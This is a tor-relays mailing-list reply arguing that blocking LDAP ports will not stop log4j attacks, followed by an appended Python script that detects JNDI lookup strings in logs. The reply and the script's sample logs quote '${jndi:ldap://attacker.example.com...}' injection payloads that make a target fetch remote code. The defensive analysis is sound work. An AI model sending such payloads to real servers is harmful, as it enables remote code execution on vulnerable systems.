
Re: [tor-relays] Mitigating log4j exploits



Hey,

On 11.12.2021 13:51, Jens Kubieziel wrote:
attacks. One possibility is, in my opinion, rejecting connection over
ports 389 and 636. What do you think? Should we as exit node operators
block connections over those LDAP ports for some amount of time?

I don't think this is going to help.

The exploit works like this: Send a special string that *references* an ldap server (most used right now, though other protocols are possible), such as "${jndi:ldap://attacker.example.com:port/a}". The target then contacts the ldap server and essentially downloads the malicious code from there. You can include a custom port as shown and many attackers do. Most exploit attempts use http(s). Nothing we can block without packet inspection.


Best regards,
Felix
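To make Felix's point measurable, here is an added example (not from the thread or the Tor project) that scans web-server log lines for the plain `${jndi:...}` lookup form quoted above, extracts the scheme, host and port of the referenced server, and counts how many of them an egress block on ports 389/636 would actually cover. The log lines, the `attacker.example.com` host and the port numbers are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Plain "${jndi:<scheme>://host[:port]/path}" form as quoted in the thread.
# The scheme is not restricted to ldap because the post notes that other
# protocols (http/https in most attempts) are used as well.
JNDI_RE = re.compile(r"\$\{jndi:([a-zA-Z][a-zA-Z0-9+.\-]*://[^}\s]+)\}")

# Default ports used when the lookup string omits one (assumed values).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "http": 80, "https": 443, "rmi": 1099}

# Constructed sample access-log lines; the host and ports are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:13:51:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example.com:389/a}"',
    '10.0.0.6 - - [11/Dec/2021:13:52:10 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example.com:1389/a}"',
    '10.0.0.7 - - [11/Dec/2021:13:53:44 +0000] "GET /?x=${jndi:https://attacker.example.com/a} HTTP/1.1" 404 "-" "curl"',
    '10.0.0.8 - - [11/Dec/2021:13:54:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
]


def extract_jndi_targets(line):
    """Return (scheme, host, port) for every JNDI lookup string in one log line."""
    targets = []
    for url in JNDI_RE.findall(line):
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
        try:
            port = parts.port  # raises ValueError on a non-numeric port
        except ValueError:
            port = None
        if port is None:
            port = DEFAULT_PORTS.get(scheme)
        targets.append((scheme, parts.hostname, port))
    return targets


def summarize(lines, blocked_ports=(389, 636)):
    """Count lookup strings seen and how many point at a blocked port."""
    total = caught = 0
    for line in lines:
        for _scheme, _host, port in extract_jndi_targets(line):
            total += 1
            if port in blocked_ports:
                caught += 1
    return total, caught


if __name__ == "__main__":
    total, caught = summarize(SAMPLE_LOG)
    print(f"{total} JNDI lookups seen, {caught} would hit a 389/636 block")
```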